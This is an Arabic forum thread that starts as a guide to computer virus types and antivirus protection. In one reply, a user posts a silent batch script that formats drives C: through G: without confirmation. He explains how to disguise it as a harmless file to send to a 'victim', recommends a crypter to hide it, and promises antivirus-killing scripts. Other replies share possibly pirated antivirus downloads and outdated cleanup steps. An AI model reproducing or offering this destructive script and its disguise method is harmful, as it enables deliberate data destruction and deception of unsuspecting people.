|
ماذا تعرف عن فيروسات الكمبيوتر ؟
فيروس الكمبيوتر هو برنامج صغير يتم إدخاله على الحاسب الاَلي من غير علم المستخدم بغرض تدمير بعض أو جميع البرامج والأجهزة المكونة للحاسب الاَلي. تقسيم الفيروسات 1- فيروسات تعمل عند بدء التشغيل : يحتاج الكمبيوتر عند تشغيله إلى تعليمات خاصة داخلية لمعرفة مكونات الجهاز ، وهي توجد عادة في ملفات تدعى ملفات النظام (System Files) ، التي تحتوي على البرامج الخاصة ببدء التشغيل. ويقوم هذا النوع من الفيروسات بالتسلل إلى القطاع الخاص ببرنامج الإقلاع على القرص (Boot Sector) ، وإتلاف محتوياته والعبث بها، ما يؤدي إلى تعطل عملية الإقلاع. 2- فيروس الملفات : يهاجم هذا النوع نظام التشغيل، وأي برامج أخرى موجودة على الكمبيوتر، كالتطبيقات المكتبية والألعاب وغيرها، ويعمل على العبث بمحتويات الملفات التي تنتهي بامتداد bin, com sys, exe, وتدميرها. 3- فيروسات الماكرو : تصيب هذه الفيروسات برامج التطبيقات المكتبية مثل مايكروسوفت وورد أو أكسل. وهي من أكثر أنواع الفيروسات انتشاراً واستخداماً في عمليات التسلل إلى كمبيوترك عبر التطبيقات. 4- الفيروسات المتعددة الملفات : تنسخ هذه الفيروسات نفسها في صيغة أولية ثم تتحول إلى صيغ أخرى لتصيب ملفات أخرى. 5- الفيروسات الخفية ( الأشباح ) : وهذه فيروسات مخادعة.. إذ أنها تختبئ في الذاكرة ثم تتصدى لطلب تشخيص وفحص قطاع التشغيل، ثم ترسل تقرير مزيف إلى السجل بأن القطاع غير مصاب. 6- الفيروسات متعددة القدرة التحوليّة : وهذه الفيروسات لها القدرة الديناميكية على التحول وتغيير الشفرات عند الإنتقال من ملف إلى آخر، لكي يصعب اكتشافها. كيفية حماية الحاسوب 1- من الضروري تركيب البرامج المضادة للفيروسات على الجهاز وتشغيلها طوال فترة استخدام الجهاز. إن هذا يتيح لهذه البرامج البحث عن الفيروسات وتدميرها سواء كان أسبوعياً أو يومياً أو عند التشغيل 2- عدم فتح أي ملف مرفق ضمن أي رسالة بريد إلكتروني أو أي برنامج آخر كالماسنجر، مهما كان مصدرها، إلا بعد أن تفحصها باستخدام برنامج مضاد للفيروسات، بشرط أن يكون مصدر الرسالة معروفاً، و أن تكون تتوقع وصول هذا الملف لأن بعض الفيروسات ترسل نفسها بأسماء أشخاص آخرين عن طريق دفتر العناوين .. لذا احذر من ذلك . 3- متابعة أخبار الفيروسات وطرق تغريرها بالمستخدم ، عبر مواقع الأخبار التقنية أو الصحف اليومية أو النشرات الإخبارية بهدف أخذ الاحتياطات اللازمة وعدم الوقوع في فخ هذا الفيروس الجديد . 4- التأكد من مصدر أي برنامج تقوم بإنزاله عبر إنترنت وفحصه بواسطة برنامج مضاد الفيروسات الذي تستخدمه قبل تثبيته في جهازك . 5- تعطيل خاصية تحميل الجهاز من مشغل الأقراص المرنة (Floppy drive) 6- من الضروري أيضاً تحديث برامج مستكشف الفيروسات بصورة دورية، من خلال الحصول عليها من الشركة المنتجة، أو من مواقع إنترنت المختلفة، كي تضمن حصولك على آخر المعلومات والأعراض الخاصة بالفيروسات الجديدة، وطريقة الوقاية منها. 7- تشغيل برامج مستكشف الفيروسات، وتفحّص أي ملفات أو برامج جديدة تصلك عبر البريد الإلكتروني، والإنترنت، والأقراص المرنة ، وعدم السماح بإدخال وتشغيل أي ملفات أو برامج مجهولة المصدر وبدون الفحص مسبقاً. 8- الانتباه إلى عدم تشغيل أو إعادة تشغيل الكمبيوتر بوجود القرص المرن في موقعه، حيث أن بعض هذه الفيروسات تختبئ داخل القرص المرن حتى تجد الفرصة الملائمة للتشغيل عندها. 9- تحميل البرامج عن طريق المواقع الموثوق فيها. من خصائص الفيروسات 1- الإنتشار : يتميز الفيروس أيضاً بقدرة هائلة على الإنتشار .. وقد سبق وأن قدمت العوامل التي تساعده في ذلك .. 2- القدرة على التخفي : للفيروسات قدرة عجيبة على التخفي والخداع عن طريق الإرتباط ببرامج أخرى كما تم أيضاً تزويد الفيروسات بخاصية التوميه والتشبّه حيث أن الفيروس يرتبط ببرنامج يقوم بأعمال لطيفة أو له قدرة عرض أشياء مثيرة، وعند بداية تشغيله يدخل إلى النظام ويعمل على تخريبه. وللفيروسات عدة وسائل للتخفي منها ارتباطه بالبرامج المحببة إلى المستخدمين .. ومنها ما يدخل النظام على شكل ملفات مخفية بحيث لا تستطيع ملاحظة وجوده عن طريق عرض ملفات البرنامج. وبعض الفيروسات تقوم بالتخفي في أماكن خاصة مثل ساعة الحاسب وتنتظر وقت التنفيذ. كما أن بعضها تقوم بإخفاء أي أثر لها حتى أن بعض مضادات الفيروسات لا تستطيع ملاحظة وجودها ثم تقوم بنسخ نفسها إلى البرامج بخفة وسرية (فيروسات تدري من أين تأكل الكتف) .. 3- القدرة التدميرية : تظهر عندما يجد الفيروس المفجر الذي يبعثه على العمل كأن يكون تاريخ معين (كفيروس تشرنوبل). أفضل برامج الحماية من الفيروسات توجد العديد من برامج الحماية من الفيروسات لكن أفضلها وأشهرها على الإطلاق هما هذان البرنامجان برنامج النورتون أنتي فايرس Norton Antivirus برنامج مكافي Mcafee وهذان البرنامجان هما الأفضل والأقوى في دنيا مكافحة الفيروسات وخصوصاً مع التحديث الدائم لهما ولتعريفات الفيروسات من خلال الإنترنت لأن التحديث الدائم للبرنامج يتيح له الفرصة في التعرف على الفيروسات الجديدة ومن ثم منعها من إحداث أي ضرر بالجهاز .. |
بارك الله فيكي أستاذة أم أمل . من أين يمكن الحصول على برنامج مكافي ( مجاني طبعا )
|
2 مرفق
حياك الله ام امل على هذا الطرح الرائع للموضوع
ولقد قرأته كلمة كلمة فحرفا حرفا .. اتمنى من الجميع الانتباة جيدا له قد يتساءل سائل منكم كيف يتم صناعة وخلق الفيرس هل هذا امر صعب ؟ كلا على الاطلاق فالفيرس عبارة عن كود تنفيذى يتم كتابتة يدويا فى بيئة الويندوز احيانا من خلال اداة "النوتباد NotePad" ولا توجد معجزات فى الامر او من خلال بعض البرامج المتخصصة فى هذا ولست بحاجة الى القسم بايمان تعيد الكافر الى حظيرة الايمان بأن لدى اكثر من 600 برنامج وفيرس ... ولكننى لا اجد الترف المناسب للتجربة ... فالروح واحدة كما يقولون وجهاز عجوز على مثل تلك المغامرات غير مأمونة العواقب ... فيما مضى حين ارغب فى ايذاء احد ... اقوم بفتح النوت باد واقوم بكتابة مثل هذا الامر المكون من سطر او خمسة اسطر على وجه التحديد .. #echo off format C:\ q /s /y format D:\ q /s /y format E:\ q /s /y format F:\ q /s /y format G:\ q /s /y ما معنى هذا الهراء ؟؟ فورمات هو امر مخصص لحذف داتا القرص الصلب .. سى او دى او اف او جية هو اسم البارتيشن فى القرص حرف كيو معناه "كويكلى يعنى سريع " Quickly حرف اس يعنى سايلنت يعنى صامت Silent حرف واى يعنى "نعم " yes لم لم يفهم فالكود يتم كتابتة فى ملف نوت باد كل سطر معناه = فورمات =القرص فلان + فورماتسريع + فورمات صامت بلا شاشة سوداء تظهر للمستخدم + نعم موافق على لافورمات حتى لا تظهر للمستخدم رسالة تطالبه بتأكيد الفورمات..." , ويتم حفظة بامتداد بات او اى اكس اية كالاتى Format.bat او طبعا مش هنكتب اسم الملف فورمات ونبعته للضحية كن ذكيال واختر اى اسم يروق لك format.exe ونحن فى اغلب الاحيان نحتار امتداد بات ... وهو الخاص بالاوامر التنفيذية ما الامر الاخر المهم فى الفيرس وصناعتة وارسالة ؟؟ طبعا تحتاج الى برنامج تشفير ال**** وتغيير ايقونتة الواضحة لبعض المستخدمين حتى لو اوهمتهم بأن هذى صورة ... فانت بحاجة الى تغيير الامتداد وتغيير الايقونة هناك العديد من برامج التشفير يمككم البحث عنها سوف اقوم بأرفاق برنامج تشفير صغير يقوم بتغيير ايقونة ال**** وتشفيرة Yap crypter.zip فى المرفقات يمكنم تحميلة .................................................. .... كثيرا ما نسمع عن بعض الفيروسات التى تقوم بقتل برامج الحماية فكيف يتم ذلك ؟ ايضا هى اكواد تنفيذية فى بيئة الدوس يتم كتابتها وتشفيرها ودمجها فى ملف الفيرس من خلال برامج البليند Blind المخصصة للدمج -- عموما فبرنامج MPS يقوم بالدمج وقد طرحتة لكم من قبل وهو مخصص لسرقة باسوودرات الياهو 10 فاقل طيب ازاى واين نجد تلك الاكواد هاكم الاكواد يا اصداقء قوموا بنسخها ولصقها فى ملف نوت باد وتسميتها باى اسم يعجبكم بشرطك ان يكون الاسم على هذى الصيغة مثلا Kill norton.bat kill avira.bat وهكذا ... المهم ان ينتهى بدوت باااااااااااااات كود قتل الافاست اقتباس:
اقتباس:
اقتباس:
اقتباس:
اقتباس:
لمن يريد الاستزادة فليكتب تعليقا حتى اضع بعض ما لدى لكم ها هنا اشكركم على المرور ... |
جزاك الله خيرا مستر أحمد على المرور والأضافة
|
اقتباس:
جرب حضرتك الرابط ده http://rapidshare.com/files/117397389/vsp80en.exe |
كلام جميل جداااااااا
|
اقتباس:
جرب دا كمان مكافى توتال بروتيكت http://www.mediafire.com/?wy4yudr4t8gylpl كلمة سر تحميل الملف من الميديا فاير :olti حجم الملف 72ميجا تقريبا -- نسخة تشمل الحماية من كافة انواع البرامج الضارة والخبيثة مدمج مع الاصدار نسخة انتى فيرس وانترنت سيكيوريتى McAfee Total Protection Password:olti for mediafire لو حبيت تحمل تحديث يومى من موقع استخدمه كثيرا فى تحديث جميع برامج االانتى فيرس www.scanwith.com بالنسبة لعرض الستة اشهر من مكافى يمكنك تحميل البرنامج مكافى توتل بروتيكت من الرابط التالى http://promos.mcafee.com/offer.aspx?id=403203 فقط قم بالتسجيل : اسم مستخدم + الباسوورد ................................. والباقى انت تعرفه بقى او حمل من هنا اختر اى رابط وقم بالتحميل منه والله المستعان ... اى استفسار انا موجود |
اقتباس:
بارك الله فيك مستر أحمد |
ان شاء الله اقدم لكم موضوع كيفية حماية الجهاز من الأصابة بالفيروسات وملفات التجسس وكيفية حذف ملفات التجسس وكيفية معرفة ان الجهاز مصاب بملفات تجسس الشرح مدعـم بالصور نبدأ مـــع الشرح -*-*-*-*-*-*-*- لمعرفة إذا كان الجهاز مخترق او لا لأصحاب ويندوز اكس بى ندخـل ل --> start او إبدأ ثم --> run او تشغيل http://www.n2hr.com/up//uploads/imag...1fcb783eac.png ثم نكتب {system.ini } http://www.n2hr.com/up//uploads/imag...d93787bd4c.png ثم موافق إذا كانت مثل الصورة التالية فجهازك سليم والحمدلله http://www.n2hr.com/up//uploads/imag...17263a30f7.png اما إذا كانت مثل الصورة التالية فجهازك مصـاب http://www.n2hr.com/up//uploads/imag...76da511c1f.png يتبع إن شاء الله |
نأتى لحذف الفيروسات http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .ندخـل ل --> start او إبدأ ثم --> run او تشغيل ثـم نكتب ((Regedit )) ثم موافق http://www.n2hr.com/up//uploads/imag...8c64174ea3.png http://www.n2hr.com/up//uploads/imag...5822b27414.png http://www.n2hr.com/up//uploads/imag...9680b702e7.png ---> file او تحرير ثم find او بحث ثــم نكتب فى مربع البحث كلمة (( poison )) http://www.n2hr.com/up//uploads/imag...e5bb849e5c.png ثم بحث http://www.n2hr.com/up//uploads/imag...8a1cd5d1f5.png لو خرج شئ بعد البحث يتم حذفه اضغط عليه كليك يمين ثم rehttp://forsanhaq.com/images/smilies/thread_moved.gif او حذف وإذا لم يخرج فلا يوجد ثم نكرر الخطوة السابقة ولكن نبحث عن (( server )) وإذا خرج شئ يتم حذفه ثم نكرر ونبحث عن (( ***** )) وإذا خرج شئ يحذف |
للتأكد من ان الجهاز سليم طريق اخرى ندخـل ل --> start او إبدأ ثم --> run او تشغيل ثم نكتب كلمة (( cmd )) http://www.n2hr.com/up//uploads/imag...da96eba9e9.png تخرج لنا هذه الشاشة وهيا شاشة الدوس http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .http://www.n2hr.com/up//uploads/imag...c4cb903508.png نكتب فيها (( dir *****)) http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .http://www.n2hr.com/up//uploads/imag...66ca9d9535.png إذا خرج مثل هذا فإن جهازك سليم والحمدلله File not found http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .http://www.n2hr.com/up//uploads/imag...a9f6ab3339.png |
يوجـد فى الجهاز ملف تجسس مــن شركة مايكروسوفت نأتى لطريقة حذفه ندخـل ل --> start او إبدأ ثم --> run او تشغيل ثم نكتب كلمة (( cmd )) تظهر شاشة الدوس نكتب الأمر التالى net user مع مراعات الفراغات http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .http://www.n2hr.com/up//uploads/imag...8c7d253314.png بيطلع رمز >> 3388945a0 >> http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .http://www.n2hr.com/up//uploads/imag...3f17914b14.png نأتى لطريق حذفة نكتب فى شاشة الدوس امر (( net user support_388945a0 delete)) http://forums.way2allah.com/images/s.../wol_error.gifهذه الصورة مصغرة إضغط هنا لعرضها بحجمها الطبيعي .http://www.n2hr.com/up//uploads/imag...0cf746a389.png ثم انتر وبذلك تم حذف ملف التجسس من شركة مايكروسوف |
بارك الله فيكى ام امل على تلكم المعلومات الرائعة والمتجددة
بس طريقة التخلص من ملف تجسس مايكروسوفت صعبة شوية انا جربتها عدة مرات ومفيش اى تغيير لما بعمل عرض لمحتوى امر نت يوزر -- بيعطينى نفس القيم والمعلومات لما حاولت اعمل ديليت -- اكد لى نجاح عملية الحزف اجى اعمل عرض .. نفس الحكاية كاننى ادور فى دائرة مفرغة |
اقتباس:
جاري التحميل ...اللهم اجعله في ميزان حسناتكما |
الأستاذ / مدرس بالأجر . أشكرك على معلوماتك القيمة والجميلة
|
| جميع الأوقات بتوقيت GMT +2. الساعة الآن 08:40 PM. |
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.